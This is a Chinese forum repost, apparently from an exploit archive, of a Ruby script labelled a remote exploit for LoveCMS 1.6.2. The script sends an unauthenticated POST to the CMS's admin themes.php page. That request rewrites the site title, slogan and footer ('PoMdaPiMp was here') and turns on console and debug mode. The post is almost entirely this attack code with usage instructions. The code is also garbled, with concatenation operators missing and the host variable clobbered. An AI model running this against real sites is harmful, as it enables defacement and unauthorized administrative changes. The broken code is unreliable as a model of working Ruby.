• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    LoveCMS 1.6.2 Final Update Settings Remote Exploit

    发布者: 酸菜鱼 | 发布时间: 2025-6-28 22:38| 查看数: 97| 评论数: 0|帖子模式

    #!/usr/bin/ruby
    #
    ## Exploit by PoMdaPiMp!
    ## ---------------------
    ##   pomdapimp(at)gmail(dotcom)
    ##
    ##   LoveCMS Exploit Series
    ##   Episode 3: changing site settings ...
    ##
    ##   Description: Simply change the site settings !
    ##
    ##   Usage: ./LoveCMS_3_settings.rb <host>
    ##   Ex:    ./LoveCMS_2_themes.rb http://site.com/lovecms/
    ##
    ##   Tested on: lovecms_1.6.2_final (MacOS X, Xampp)
    #

    require 'net/http'
    require 'uri'

    @host = 'http://127.0.0.1/lovecms_1.6.2_final/lovecms/'
    @post_vars = {}
    @post_vars['submit'] = 1
    @post_vars['pagetitle'] = 'P4g3T1t1le'
    @post_vars['sitename'] = 'SiteN4me'
    @post_vars['slogan'] = 'By PoMdaPiMp.'
    @post_vars['footer'] = 'PoMdaPiMp was here.'
    @post_vars['description'] = 'Ruby is a gift.'
    @post_vars['keywords'] = 'PoMdaPiMp, hack'
    @post_vars['encoding'] = 'utf-8'
    @post_vars['tips'] = 'off'
    @post_vars['console'] = 'on'
    @post_vars['debugmode'] = 'on'
    @post_vars['module'] = 2
    @post_vars['love_root'] = ''
    @post_vars['love_url'] = ''

    @host = ARGV[0] if ARGV[0]
    @host  = @host[-1, 1].to_s != '/' ? '/' : ''

    if @host
      # --
      puts "   LoveCMS Exploit Series. #3: Messing with settings."
      puts
      puts " : Attacking host: "   @host

      # --
      # Changing settings
      res = Net::HTTP.post_form(URI.parse(@host   'system/admin/themes.php'),
                                @post_vars)
      puts " :: Values set."
      @post_vars.each do |k, v|
        puts "    "   k.to_s   " > "   v.to_s
      end

      # --
      puts
      puts " - Visit "   @host
    end


    来源:https://www.jb51.net/hack/5593.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表